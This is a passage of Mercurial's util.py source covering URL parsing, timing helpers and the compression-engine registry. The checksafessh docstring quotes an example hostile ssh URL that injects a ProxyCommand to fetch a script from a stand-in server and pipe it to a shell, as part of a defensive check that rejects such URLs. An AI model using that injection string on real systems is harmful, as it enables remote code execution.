2775 2775 # path when we store it, the path might contain '%2f' = '/',
2776 2776 # which we should *not* escape.
2777 2777 s += urlreq.quote(self.path, safe=self._safepchars)
2778 2778 if self.query:
2779 2779 # we store the query in escaped form.
2780 2780 s += '?' + self.query
2781 2781 if self.fragment is not None:
2782 2782 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2783 2783 return s
2784 2784
2785 2785 __str__ = encoding.strmethod(__bytes__)
2786 2786
2787 2787 def authinfo(self):
2788 2788 user, passwd = self.user, self.passwd
2789 2789 try:
2790 2790 self.user, self.passwd = None, None
2791 2791 s = bytes(self)
2792 2792 finally:
2793 2793 self.user, self.passwd = user, passwd
2794 2794 if not self.user:
2795 2795 return (s, None)
2796 2796 # authinfo[1] is passed to urllib2 password manager, and its
2797 2797 # URIs must not contain credentials. The host is passed in the
2798 2798 # URIs list because Python < 2.4.3 uses only that to search for
2799 2799 # a password.
2800 2800 return (s, (None, (s, self.host),
2801 2801 self.user, self.passwd or ''))
2802 2802
2803 2803 def isabs(self):
2804 2804 if self.scheme and self.scheme != 'file':
2805 2805 return True # remote URL
2806 2806 if hasdriveletter(self.path):
2807 2807 return True # absolute for our purposes - can't be joined()
2808 2808 if self.path.startswith(br'\\'):
2809 2809 return True # Windows UNC path
2810 2810 if self.path.startswith('/'):
2811 2811 return True # POSIX-style
2812 2812 return False
2813 2813
2814 2814 def localpath(self):
2815 2815 if self.scheme == 'file' or self.scheme == 'bundle':
2816 2816 path = self.path or '/'
2817 2817 # For Windows, we need to promote hosts containing drive
2818 2818 # letters to paths with drive letters.
2819 2819 if hasdriveletter(self._hostport):
2820 2820 path = self._hostport + '/' + self.path
2821 2821 elif (self.host is not None and self.path
2822 2822 and not hasdriveletter(path)):
2823 2823 path = '/' + path
2824 2824 return path
2825 2825 return self._origpath
2826 2826
2827 2827 def islocal(self):
2828 2828 '''whether localpath will return something that posixfile can open'''
2829 2829 return (not self.scheme or self.scheme == 'file'
2830 2830 or self.scheme == 'bundle')
2831 2831
2832 2832 def hasscheme(path):
2833 2833 return bool(url(path).scheme)
2834 2834
2835 2835 def hasdriveletter(path):
2836 2836 return path and path[1:2] == ':' and path[0:1].isalpha()
2837 2837
2838 2838 def urllocalpath(path):
2839 2839 return url(path, parsequery=False, parsefragment=False).localpath()
2840 2840
2841 2841 def checksafessh(path):
2842 2842 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2843 2843
2844 2844 This is a sanity check for ssh urls. ssh will parse the first item as
2845 2845 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2846 2846 Let's prevent these potentially exploited urls entirely and warn the
2847 2847 user.
2848 2848
2849 2849 Raises an error.Abort when the url is unsafe.
2850 2850 """
2851 2851 path = urlreq.unquote(path)
2852 2852 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2853 2853 raise error.Abort(_('potentially unsafe url: %r') %
2854 2854 (pycompat.bytestr(path),))
2855 2855
2856 2856 def hidepassword(u):
2857 2857 '''hide user credential in a url string'''
2858 2858 u = url(u)
2859 2859 if u.passwd:
2860 2860 u.passwd = '***'
2861 2861 return bytes(u)
2862 2862
2863 2863 def removeauth(u):
2864 2864 '''remove all authentication information from a url string'''
2865 2865 u = url(u)
2866 2866 u.user = u.passwd = None
2867 2867 return str(u)
2868 2868
2869 2869 timecount = unitcountfn(
2870 2870 (1, 1e3, _('%.0f s')),
2871 2871 (100, 1, _('%.1f s')),
2872 2872 (10, 1, _('%.2f s')),
2873 2873 (1, 1, _('%.3f s')),
2874 2874 (100, 0.001, _('%.1f ms')),
2875 2875 (10, 0.001, _('%.2f ms')),
2876 2876 (1, 0.001, _('%.3f ms')),
2877 2877 (100, 0.000001, _('%.1f us')),
2878 2878 (10, 0.000001, _('%.2f us')),
2879 2879 (1, 0.000001, _('%.3f us')),
2880 2880 (100, 0.000000001, _('%.1f ns')),
2881 2881 (10, 0.000000001, _('%.2f ns')),
2882 2882 (1, 0.000000001, _('%.3f ns')),
2883 2883 )
2884 2884
2885 2885 _timenesting = [0]
2886 2886
2887 2887 def timed(func):
2888 2888 '''Report the execution time of a function call to stderr.
2889 2889
2890 2890 During development, use as a decorator when you need to measure
2891 2891 the cost of a function, e.g. as follows:
2892 2892
2893 2893 @util.timed
2894 2894 def foo(a, b, c):
2895 2895 pass
2896 2896 '''
2897 2897
2898 2898 def wrapper(*args, **kwargs):
2899 2899 start = timer()
2900 2900 indent = 2
2901 2901 _timenesting[0] += indent
2902 2902 try:
2903 2903 return func(*args, **kwargs)
2904 2904 finally:
2905 2905 elapsed = timer() - start
2906 2906 _timenesting[0] -= indent
2907 2907 stderr.write('%s%s: %s\n' %
2908 2908 (' ' * _timenesting[0], func.__name__,
2909 2909 timecount(elapsed)))
2910 2910 return wrapper
2911 2911
2912 2912 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2913 2913 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2914 2914
2915 2915 def sizetoint(s):
2916 2916 '''Convert a space specifier to a byte count.
2917 2917
2918 2918 >>> sizetoint(b'30')
2919 2919 30
2920 2920 >>> sizetoint(b'2.2kb')
2921 2921 2252
2922 2922 >>> sizetoint(b'6M')
2923 2923 6291456
2924 2924 '''
2925 2925 t = s.strip().lower()
2926 2926 try:
2927 2927 for k, u in _sizeunits:
2928 2928 if t.endswith(k):
2929 2929 return int(float(t[:-len(k)]) * u)
2930 2930 return int(t)
2931 2931 except ValueError:
2932 2932 raise error.ParseError(_("couldn't parse size: %s") % s)
2933 2933
2934 2934 class hooks(object):
2935 2935 '''A collection of hook functions that can be used to extend a
2936 2936 function's behavior. Hooks are called in lexicographic order,
2937 2937 based on the names of their sources.'''
2938 2938
2939 2939 def __init__(self):
2940 2940 self._hooks = []
2941 2941
2942 2942 def add(self, source, hook):
2943 2943 self._hooks.append((source, hook))
2944 2944
2945 2945 def __call__(self, *args):
2946 2946 self._hooks.sort(key=lambda x: x[0])
2947 2947 results = []
2948 2948 for source, hook in self._hooks:
2949 2949 results.append(hook(*args))
2950 2950 return results
2951 2951
2952 2952 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2953 2953 '''Yields lines for a nicely formatted stacktrace.
2954 2954 Skips the 'skip' last entries, then return the last 'depth' entries.
2955 2955 Each file+linenumber is formatted according to fileline.
2956 2956 Each line is formatted according to line.
2957 2957 If line is None, it yields:
2958 2958 length of longest filepath+line number,
2959 2959 filepath+linenumber,
2960 2960 function
2961 2961
2962 2962 Not be used in production code but very convenient while developing.
2963 2963 '''
2964 2964 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
2965 2965 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
2966 2966 ][-depth:]
2967 2967 if entries:
2968 2968 fnmax = max(len(entry[0]) for entry in entries)
2969 2969 for fnln, func in entries:
2970 2970 if line is None:
2971 2971 yield (fnmax, fnln, func)
2972 2972 else:
2973 2973 yield line % (fnmax, fnln, func)
2974 2974
2975 2975 def debugstacktrace(msg='stacktrace', skip=0,
2976 2976 f=procutil.stderr, otherf=procutil.stdout, depth=0):
2977 2977 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
2978 2978 Skips the 'skip' entries closest to the call, then show 'depth' entries.
2979 2979 By default it will flush stdout first.
2980 2980 It can be used everywhere and intentionally does not require an ui object.
2981 2981 Not be used in production code but very convenient while developing.
2982 2982 '''
2983 2983 if otherf:
2984 2984 otherf.flush()
2985 2985 f.write('%s at:\n' % msg.rstrip())
2986 2986 for line in getstackframes(skip + 1, depth=depth):
2987 2987 f.write(line)
2988 2988 f.flush()
2989 2989
2990 2990 class dirs(object):
2991 2991 '''a multiset of directory names from a dirstate or manifest'''
2992 2992
2993 2993 def __init__(self, map, skip=None):
2994 2994 self._dirs = {}
2995 2995 addpath = self.addpath
2996 2996 if safehasattr(map, 'iteritems') and skip is not None:
2997 2997 for f, s in map.iteritems():
2998 2998 if s[0] != skip:
2999 2999 addpath(f)
3000 3000 else:
3001 3001 for f in map:
3002 3002 addpath(f)
3003 3003
3004 3004 def addpath(self, path):
3005 3005 dirs = self._dirs
3006 3006 for base in finddirs(path):
3007 3007 if base in dirs:
3008 3008 dirs[base] += 1
3009 3009 return
3010 3010 dirs[base] = 1
3011 3011
3012 3012 def delpath(self, path):
3013 3013 dirs = self._dirs
3014 3014 for base in finddirs(path):
3015 3015 if dirs[base] > 1:
3016 3016 dirs[base] -= 1
3017 3017 return
3018 3018 del dirs[base]
3019 3019
3020 3020 def __iter__(self):
3021 3021 return iter(self._dirs)
3022 3022
3023 3023 def __contains__(self, d):
3024 3024 return d in self._dirs
3025 3025
3026 3026 if safehasattr(parsers, 'dirs'):
3027 3027 dirs = parsers.dirs
3028 3028
3029 3029 def finddirs(path):
3030 3030 pos = path.rfind('/')
3031 3031 while pos != -1:
3032 3032 yield path[:pos]
3033 3033 pos = path.rfind('/', 0, pos)
3034 3034
3035 3035 # compression code
3036 3036
3037 3037 SERVERROLE = 'server'
3038 3038 CLIENTROLE = 'client'
3039 3039
3040 3040 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3041 3041 (u'name', u'serverpriority',
3042 3042 u'clientpriority'))
3043 3043
3044 3044 class compressormanager(object):
3045 3045 """Holds registrations of various compression engines.
3046 3046
3047 3047 This class essentially abstracts the differences between compression
3048 3048 engines to allow new compression formats to be added easily, possibly from
3049 3049 extensions.
3050 3050
3051 3051 Compressors are registered against the global instance by calling its
3052 3052 ``register()`` method.
3053 3053 """
3054 3054 def __init__(self):
3055 3055 self._engines = {}
3056 3056 # Bundle spec human name to engine name.
3057 3057 self._bundlenames = {}
3058 3058 # Internal bundle identifier to engine name.
3059 3059 self._bundletypes = {}
3060 3060 # Revlog header to engine name.
3061 3061 self._revlogheaders = {}
3062 3062 # Wire proto identifier to engine name.
3063 3063 self._wiretypes = {}
3064 3064
3065 3065 def __getitem__(self, key):
3066 3066 return self._engines[key]
3067 3067
3068 3068 def __contains__(self, key):
3069 3069 return key in self._engines
3070 3070
3071 3071 def __iter__(self):
3072 3072 return iter(self._engines.keys())
3073 3073
3074 3074 def register(self, engine):
3075 3075 """Register a compression engine with the manager.
3076 3076
3077 3077 The argument must be a ``compressionengine`` instance.
3078 3078 """
3079 3079 if not isinstance(engine, compressionengine):
3080 3080 raise ValueError(_('argument must be a compressionengine'))
3081 3081
3082 3082 name = engine.name()
3083 3083
3084 3084 if name in self._engines:
3085 3085 raise error.Abort(_('compression engine %s already registered') %
3086 3086 name)
3087 3087
3088 3088 bundleinfo = engine.bundletype()
3089 3089 if bundleinfo:
3090 3090 bundlename, bundletype = bundleinfo
3091 3091
3092 3092 if bundlename in self._bundlenames:
3093 3093 raise error.Abort(_('bundle name %s already registered') %
3094 3094 bundlename)
3095 3095 if bundletype in self._bundletypes:
3096 3096 raise error.Abort(_('bundle type %s already registered by %s') %
3097 3097 (bundletype, self._bundletypes[bundletype]))
3098 3098
3099 3099 # No external facing name declared.
3100 3100 if bundlename:
3101 3101 self._bundlenames[bundlename] = name
3102 3102
3103 3103 self._bundletypes[bundletype] = name
3104 3104
3105 3105 wiresupport = engine.wireprotosupport()
3106 3106 if wiresupport:
3107 3107 wiretype = wiresupport.name
3108 3108 if wiretype in self._wiretypes:
3109 3109 raise error.Abort(_('wire protocol compression %s already '
3110 3110 'registered by %s') %
3111 3111 (wiretype, self._wiretypes[wiretype]))
3112 3112
3113 3113 self._wiretypes[wiretype] = name
3114 3114
3115 3115 revlogheader = engine.revlogheader()
3116 3116 if revlogheader and revlogheader in self._revlogheaders:
3117 3117 raise error.Abort(_('revlog header %s already registered by %s') %
3118 3118 (revlogheader, self._revlogheaders[revlogheader]))
3119 3119
3120 3120 if revlogheader:
3121 3121 self._revlogheaders[revlogheader] = name
3122 3122
3123 3123 self._engines[name] = engine
3124 3124
3125 3125 @property
3126 3126 def supportedbundlenames(self):
3127 3127 return set(self._bundlenames.keys())
3128 3128
3129 3129 @property
3130 3130 def supportedbundletypes(self):
3131 3131 return set(self._bundletypes.keys())
3132 3132
3133 3133 def forbundlename(self, bundlename):
3134 3134 """Obtain a compression engine registered to a bundle name.
3135 3135
3136 3136 Will raise KeyError if the bundle type isn't registered.
3137 3137
3138 3138 Will abort if the engine is known but not available.
3139 3139 """
3140 3140 engine = self._engines[self._bundlenames[bundlename]]
3141 3141 if not engine.available():
3142 3142 raise error.Abort(_('compression engine %s could not be loaded') %
3143 3143 engine.name())
3144 3144 return engine
3145 3145
3146 3146 def forbundletype(self, bundletype):
3147 3147 """Obtain a compression engine registered to a bundle type.
3148 3148
3149 3149 Will raise KeyError if the bundle type isn't registered.
3150 3150
3151 3151 Will abort if the engine is known but not available.
3152 3152 """
3153 3153 engine = self._engines[self._bundletypes[bundletype]]
3154 3154 if not engine.available():
3155 3155 raise error.Abort(_('compression engine %s could not be loaded') %
3156 3156 engine.name())
3157 3157 return engine
3158 3158
3159 3159 def supportedwireengines(self, role, onlyavailable=True):
3160 3160 """Obtain compression engines that support the wire protocol.
3161 3161
3162 3162 Returns a list of engines in prioritized order, most desired first.
3163 3163
3164 3164 If ``onlyavailable`` is set, filter out engines that can't be
3165 3165 loaded.
3166 3166 """
3167 3167 assert role in (SERVERROLE, CLIENTROLE)
3168 3168
3169 3169 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3170 3170
3171 3171 engines = [self._engines[e] for e in self._wiretypes.values()]
3172 3172 if onlyavailable:
3173 3173 engines = [e for e in engines if e.available()]
3174 3174
3175 3175 def getkey(e):
3176 3176 # Sort first by priority, highest first. In case of tie, sort
3177 3177 # alphabetically. This is arbitrary, but ensures output is
3178 3178 # stable.
3179 3179 w = e.wireprotosupport()
3180 3180 return -1 * getattr(w, attr), w.name
3181 3181
3182 3182 return list(sorted(engines, key=getkey))
3183 3183
3184 3184 def forwiretype(self, wiretype):
3185 3185 engine = self._engines[self._wiretypes[wiretype]]
3186 3186 if not engine.available():
3187 3187 raise error.Abort(_('compression engine %s could not be loaded') %
3188 3188 engine.name())
3189 3189 return engine
3190 3190
3191 3191 def forrevlogheader(self, header):
3192 3192 """Obtain a compression engine registered to a revlog header.
3193 3193
3194 3194 Will raise KeyError if the revlog header value isn't registered.
3195 3195 """
3196 3196 return self._engines[self._revlogheaders[header]]
3197 3197
3198 3198 compengines = compressormanager()
3199 3199
3200 3200 class compressionengine(object):
3201 3201 """Base class for compression engines.
3202 3202
3203 3203 Compression engines must implement the interface defined by this class.
3204 3204 """
3205 3205 def name(self):
3206 3206 """Returns the name of the compression engine.
3207 3207
3208 3208 This is the key the engine is registered under.
3209 3209
3210 3210 This method must be implemented.
3211 3211 """
3212 3212 raise NotImplementedError()
3213 3213
3214 3214 def available(self):
3215 3215 """Whether the compression engine is available.
3216 3216
3217 3217 The intent of this method is to allow optional compression engines
3218 3218 that may not be available in all installations (such as engines relying
3219 3219 on C extensions that may not be present).
3220 3220 """
3221 3221 return True
3222 3222
3223 3223 def bundletype(self):
3224 3224 """Describes bundle identifiers for this engine.
3225 3225
3226 3226 If this compression engine isn't supported for bundles, returns None.
3227 3227
3228 3228 If this engine can be used for bundles, returns a 2-tuple of strings of
3229 3229 the user-facing "bundle spec" compression name and an internal
3230 3230 identifier used to denote the compression format within bundles. To
3231 3231 exclude the name from external usage, set the first element to ``None``.
3232 3232
3233 3233 If bundle compression is supported, the class must also implement
3234 3234 ``compressstream`` and `decompressorreader``.
3235 3235
3236 3236 The docstring of this method is used in the help system to tell users
3237 3237 about this engine.
3238 3238 """
3239 3239 return None
3240 3240
3241 3241 def wireprotosupport(self):
3242 3242 """Declare support for this compression format on the wire protocol.
3243 3243
3244 3244 If this compression engine isn't supported for compressing wire
3245 3245 protocol payloads, returns None.
3246 3246
3247 3247 Otherwise, returns ``compenginewireprotosupport`` with the following
3248 3248 fields:
3249 3249
3250 3250 * String format identifier
3251 3251 * Integer priority for the server
3252 3252 * Integer priority for the client
3253 3253
3254 3254 The integer priorities are used to order the advertisement of format
3255 3255 support by server and client. The highest integer is advertised
3256 3256 first. Integers with non-positive values aren't advertised.
3257 3257
3258 3258 The priority values are somewhat arbitrary and only used for default
3259 3259 ordering. The relative order can be changed via config options.
3260 3260
3261 3261 If wire protocol compression is supported, the class must also implement
3262 3262 ``compressstream`` and ``decompressorreader``.
3263 3263 """
3264 3264 return None
3265 3265
3266 3266 def revlogheader(self):
3267 3267 """Header added to revlog chunks that identifies this engine.
3268 3268
3269 3269 If this engine can be used to compress revlogs, this method should
3270 3270 return the bytes used to identify chunks compressed with this engine.
3271 3271 Else, the method should return ``None`` to indicate it does not
3272 3272 participate in revlog compression.
3273 3273 """
3274 3274 return None
3275 3275
3276 3276 def compressstream(self, it, opts=None):
3277 3277 """Compress an iterator of chunks.
3278 3278
3279 3279 The method receives an iterator (ideally a generator) of chunks of
3280 3280 bytes to be compressed. It returns an iterator (ideally a generator)
3281 3281 of bytes of chunks representing the compressed output.
3282 3282
3283 3283 Optionally accepts an argument defining how to perform compression.
3284 3284 Each engine treats this argument differently.
3285 3285 """
3286 3286 raise NotImplementedError()
3287 3287
3288 3288 def decompressorreader(self, fh):
3289 3289 """Perform decompression on a file object.
3290 3290
3291 3291 Argument is an object with a ``read(size)`` method that returns
3292 3292 compressed data. Return value is an object with a ``read(size)`` that
3293 3293 returns uncompressed data.
3294 3294 """
3295 3295 raise NotImplementedError()
3296 3296
3297 3297 def revlogcompressor(self, opts=None):
3298 3298 """Obtain an object that can be used to compress revlog entries.
3299 3299
3300 3300 The object has a ``compress(data)`` method that compresses binary
3301 3301 data. This method returns compressed binary data or ``None`` if
3302 3302 the data could not be compressed (too small, not compressible, etc).
3303 3303 The returned data should have a header uniquely identifying this
3304 3304 compression format so decompression can be routed to this engine.
3305 3305 This header should be identified by the ``revlogheader()`` return
3306 3306 value.
3307 3307
3308 3308 The object has a ``decompress(data)`` method that decompresses
3309 3309 data. The method will only be called if ``data`` begins with
3310 3310 ``revlogheader()``. The method should return the raw, uncompressed
3311 3311 data or raise a ``RevlogError``.
3312 3312
3313 3313 The object is reusable but is not thread safe.
3314 3314 """
3315 3315 raise NotImplementedError()
3316 3316
3317 3317 class _zlibengine(compressionengine):
3318 3318 def name(self):
3319 3319 return 'zlib'
3320 3320
3321 3321 def bundletype(self):
3322 3322 """zlib compression using the DEFLATE algorithm.
3323 3323
3324 3324 All Mercurial clients should support this format. The compression
3325 3325 algorithm strikes a reasonable balance between compression ratio
3326 3326 and size.
3327 3327 """
3328 3328 return 'gzip', 'GZ'
3329 3329
3330 3330 def wireprotosupport(self):
3331 3331 return compewireprotosupport('zlib', 20, 20)
3332 3332
3333 3333 def revlogheader(self):
3334 3334 return 'x'
3335 3335
3336 3336 def compressstream(self, it, opts=None):
3337 3337 opts = opts or {}
3338 3338
3339 3339 z = zlib.compressobj(opts.get('level', -1))
3340 3340 for chunk in it:
3341 3341 data = z.compress(chunk)
3342 3342 # Not all calls to compress emit data. It is cheaper to inspect
3343 3343 # here than to feed empty chunks through generator.
3344 3344 if data:
3345 3345 yield data
3346 3346
3347 3347 yield z.flush()
3348 3348
3349 3349 def decompressorreader(self, fh):
3350 3350 def gen():
3351 3351 d = zlib.decompressobj()
3352 3352 for chunk in filechunkiter(fh):
3353 3353 while chunk:
3354 3354 # Limit output size to limit memory.
3355 3355 yield d.decompress(chunk, 2 ** 18)
3356 3356 chunk = d.unconsumed_tail
3357 3357
3358 3358 return chunkbuffer(gen())
3359 3359
3360 3360 class zlibrevlogcompressor(object):
3361 3361 def compress(self, data):
3362 3362 insize = len(data)
3363 3363 # Caller handles empty input case.
3364 3364 assert insize > 0
3365 3365
3366 3366 if insize < 44:
3367 3367 return None
3368 3368
3369 3369 elif insize <= 1000000:
3370 3370 compressed = zlib.compress(data)
3371 3371 if len(compressed) < insize:
3372 3372 return compressed
3373 3373 return None
3374 3374
3375 3375 # zlib makes an internal copy of the input buffer, doubling
3376 3376 # memory usage for large inputs. So do streaming compression
3377 3377 # on large inputs.
3378 3378 else:
3379 3379 z = zlib.compressobj()
3380 3380 parts = []
3381 3381 pos = 0
3382 3382 while pos < insize:
3383 3383 pos2 = pos + 2**20
3384 3384 parts.append(z.compress(data[pos:pos2]))
3385 3385 pos = pos2
3386 3386 parts.append(z.flush())
3387 3387
3388 3388 if sum(map(len, parts)) < insize:
3389 3389 return ''.join(parts)
3390 3390 return None
3391 3391
3392 3392 def decompress(self, data):
3393 3393 try:
3394 3394 return zlib.decompress(data)
3395 3395 except zlib.error as e:
3396 3396 raise error.RevlogError(_('revlog decompress error: %s') %
3397 3397 stringutil.forcebytestr(e))
3398 3398
3399 3399 def revlogcompressor(self, opts=None):
3400 3400 return self.zlibrevlogcompressor()
3401 3401
3402 3402 compengines.register(_zlibengine())
3403 3403
3404 3404 class _bz2engine(compressionengine):
3405 3405 def name(self):
3406 3406 return 'bz2'
3407 3407
3408 3408 def bundletype(self):
3409 3409 """An algorithm that produces smaller bundles than ``gzip``.
3410 3410
3411 3411 All Mercurial clients should support this format.
3412 3412
3413 3413 This engine will likely produce smaller bundles than ``gzip`` but
3414 3414 will be significantly slower, both during compression and
3415 3415 decompression.
3416 3416
3417 3417 If available, the ``zstd`` engine can yield similar or better
3418 3418 compression at much higher speeds.
3419 3419 """
3420 3420 return 'bzip2', 'BZ'
3421 3421
3422 3422 # We declare a protocol name but don't advertise by default because
3423 3423 # it is slow.
3424 3424 def wireprotosupport(self):
3425 3425 return compewireprotosupport('bzip2', 0, 0)
3426 3426
3427 3427 def compressstream(self, it, opts=None):
3428 3428 opts = opts or {}
3429 3429 z = bz2.BZ2Compressor(opts.get('level', 9))
3430 3430 for chunk in it:
3431 3431 data = z.compress(chunk)
3432 3432 if data:
3433 3433 yield data
3434 3434
3435 3435 yield z.flush()
3436 3436
3437 3437 def decompressorreader(self, fh):
3438 3438 def gen():
3439 3439 d = bz2.BZ2Decompressor()
3440 3440 for chunk in filechunkiter(fh):
3441 3441 yield d.decompress(chunk)
3442 3442
3443 3443 return chunkbuffer(gen())
3444 3444
3445 3445 compengines.register(_bz2engine())
3446 3446
3447 3447 class _truncatedbz2engine(compressionengine):
3448 3448 def name(self):
3449 3449 return 'bz2truncated'
3450 3450
3451 3451 def bundletype(self):
3452 3452 return None, '_truncatedBZ'
3453 3453
3454 3454 # We don't implement compressstream because it is hackily handled elsewhere.
3455 3455
3456 3456 def decompressorreader(self, fh):
3457 3457 def gen():
3458 3458 # The input stream doesn't have the 'BZ' header. So add it back.
3459 3459 d = bz2.BZ2Decompressor()
3460 3460 d.decompress('BZ')
3461 3461 for chunk in filechunkiter(fh):
3462 3462 yield d.decompress(chunk)
3463 3463
3464 3464 return chunkbuffer(gen())
3465 3465
3466 3466 compengines.register(_truncatedbz2engine())
3467 3467
3468 3468 class _noopengine(compressionengine):
3469 3469 def name(self):
3470 3470 return 'none'
3471 3471
3472 3472 def bundletype(self):
3473 3473 """No compression is performed.
3474 3474
3475 3475 Use this compression engine to explicitly disable compression.
3476 3476 """
3477 3477 return 'none', 'UN'
3478 3478
3479 3479 # Clients always support uncompressed payloads. Servers don't because
3480 3480 # unless you are on a fast network, uncompressed payloads can easily
3481 3481 # saturate your network pipe.
3482 3482 def wireprotosupport(self):
3483 3483 return compewireprotosupport('none', 0, 10)
3484 3484
3485 3485 # We don't implement revlogheader because it is handled specially
3486 3486 # in the revlog class.
3487 3487
3488 3488 def compressstream(self, it, opts=None):
3489 3489 return it
3490 3490
3491 3491 def decompressorreader(self, fh):
3492 3492 return fh
3493 3493
3494 3494 class nooprevlogcompressor(object):
3495 3495 def compress(self, data):
3496 3496 return None
3497 3497
3498 3498 def revlogcompressor(self, opts=None):
3499 3499 return self.nooprevlogcompressor()
3500 3500
3501 3501 compengines.register(_noopengine())
3502 3502
3503 3503 class _zstdengine(compressionengine):
3504 3504 def name(self):
3505 3505 return 'zstd'
3506 3506
3507 3507 @propertycache
3508 3508 def _module(self):
3509 3509 # Not all installs have the zstd module available. So defer importing
3510 3510 # until first access.
3511 3511 try:
3512 3512 from . import zstd
3513 3513 # Force delayed import.
3514 3514 zstd.__version__
3515 3515 return zstd
3516 3516 except ImportError:
3517 3517 return None
3518 3518
3519 3519 def available(self):
3520 3520 return bool(self._module)
3521 3521
3522 3522 def bundletype(self):
3523 3523 """A modern compression algorithm that is fast and highly flexible.
3524 3524
3525 3525 Only supported by Mercurial 4.1 and newer clients.
3526 3526
3527 3527 With the default settings, zstd compression is both faster and yields
3528 3528 better compression than ``gzip``. It also frequently yields better
3529 3529 compression than ``bzip2`` while operating at much higher speeds.
3530 3530
3531 3531 If this engine is available and backwards compatibility is not a
3532 3532 concern, it is likely the best available engine.
3533 3533 """
3534 3534 return 'zstd', 'ZS'
3535 3535
3536 3536 def wireprotosupport(self):
3537 3537 return compewireprotosupport('zstd', 50, 50)
3538 3538
3539 3539 def revlogheader(self):
3540 3540 return '\x28'
3541 3541
3542 3542 def compressstream(self, it, opts=None):
3543 3543 opts = opts or {}
3544 3544 # zstd level 3 is almost always significantly faster than zlib
3545 3545 # while providing no worse compression. It strikes a good balance
3546 3546 # between speed and compression.
3547 3547 level = opts.get('level', 3)
3548 3548
3549 3549 zstd = self._module
3550 3550 z = zstd.ZstdCompressor(level=level).compressobj()
3551 3551 for chunk in it:
3552 3552 data = z.compress(chunk)
3553 3553 if data:
3554 3554 yield data
3555 3555
3556 3556 yield z.flush()
3557 3557
3558 3558 def decompressorreader(self, fh):
3559 3559 zstd = self._module
3560 3560 dctx = zstd.ZstdDecompressor()
3561 3561 return chunkbuffer(dctx.read_from(fh))
3562 3562
3563 3563 class zstdrevlogcompressor(object):
3564 3564 def __init__(self, zstd, level=3):
3565 3565 # Writing the content size adds a few bytes to the output. However,
3566 3566 # it allows decompression to be more optimal since we can
3567 3567 # pre-allocate a buffer to hold the result.
3568 3568 self._cctx = zstd.ZstdCompressor(level=level,
3569 3569 write_content_size=True)
3570 3570 self._dctx = zstd.ZstdDecompressor()
3571 3571 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3572 3572 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3573 3573
3574 3574 def compress(self, data):
3575 3575 insize = len(data)
3576 3576 # Caller handles empty input case.
3577 3577 assert insize > 0
3578 3578
3579 3579 if insize < 50:
3580 3580 return None
3581 3581
3582 3582 elif insize <= 1000000:
3583 3583 compressed = self._cctx.compress(data)
3584 3584 if len(compressed) < insize:
3585 3585 return compressed
3586 3586 return None
3587 3587 else:
3588 3588 z = self._cctx.compressobj()
3589 3589 chunks = []
3590 3590 pos = 0
3591 3591 while pos < insize:
3592 3592 pos2 = pos + self._compinsize
3593 3593 chunk = z.compress(data[pos:pos2])
3594 3594 if chunk:
3595 3595 chunks.append(chunk)
3596 3596 pos = pos2
3597 3597 chunks.append(z.flush())
3598 3598
3599 3599 if sum(map(len, chunks)) < insize:
3600 3600 return ''.join(chunks)
3601 3601 return None
3602 3602
3603 3603 def decompress(self, data):
3604 3604 insize = len(data)
3605 3605
3606 3606 try:
3607 3607 # This was measured to be faster than other streaming
3608 3608 # decompressors.
3609 3609 dobj = self._dctx.decompressobj()
3610 3610 chunks = []
3611 3611 pos = 0
3612 3612 while pos < insize:
3613 3613 pos2 = pos + self._decompinsize
3614 3614 chunk = dobj.decompress(data[pos:pos2])
3615 3615 if chunk:
3616 3616 chunks.append(chunk)
3617 3617 pos = pos2
3618 3618 # Frame should be exhausted, so no finish() API.
3619 3619
3620 3620 return ''.join(chunks)
3621 3621 except Exception as e:
3622 3622 raise error.RevlogError(_('revlog decompress error: %s') %
3623 3623 stringutil.forcebytestr(e))
3624 3624
3625 3625 def revlogcompressor(self, opts=None):
3626 3626 opts = opts or {}
3627 3627 return self.zstdrevlogcompressor(self._module,
3628 3628 level=opts.get('level', 3))
3629 3629
3630 3630 compengines.register(_zstdengine())
3631 3631
3632 3632 def bundlecompressiontopics():
3633 3633 """Obtains a list of available bundle compressions for use in help."""
3634 3634 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3635 3635 items = {}
3636 3636
3637 3637 # We need to format the docstring. So use a dummy object/type to hold it
3638 3638 # rather than mutating the original.
3639 3639 class docobject(object):
3640 3640 pass
3641 3641
3642 3642 for name in compengines:
3643 3643 engine = compengines[name]
3644 3644
3645 3645 if not engine.available():
3646 3646 continue
3647 3647
3648 3648 bt = engine.bundletype()
3649 3649 if not bt or not bt[0]:
3650 3650 continue
3651 3651
3652 3652 doc = pycompat.sysstr('``%s``\n %s') % (
3653 3653 bt[0], engine.bundletype.__doc__)
3654 3654
3655 3655 value = docobject()
3656 3656 value.__doc__ = doc
3657 3657 value._origdoc = engine.bundletype.__doc__
3658 3658 value._origfunc = engine.bundletype
3659 3659
3660 3660 items[bt[0]] = value
3661 3661
3662 3662 return items
3663 3663
3664 3664 i18nfunctions = bundlecompressiontopics().values()
3665 3665
3666 3666 # convenient shortcut
3667 3667 dst = debugstacktrace
3668 3668
3669 3669 def safename(f, tag, ctx, others=None):
3670 3670 """
3671 3671 Generate a name that it is safe to rename f to in the given context.
3672 3672
3673 3673 f: filename to rename
3674 3674 tag: a string tag that will be included in the new name
3675 3675 ctx: a context, in which the new name must not exist
3676 3676 others: a set of other filenames that the new name must not be in
3677 3677
3678 3678 Returns a file name of the form oldname~tag[~number] which does not exist
3679 3679 in the provided context and is not in the set of other names.
3680 3680 """
3681 3681 if others is None:
3682 3682 others = set()
3683 3683
3684 3684 fn = '%s~%s' % (f, tag)
3685 3685 if fn not in ctx and fn not in others:
3686 3686 return fn
3687 3687 for n in itertools.count(1):
3688 3688 fn = '%s~%s~%s' % (f, tag, n)
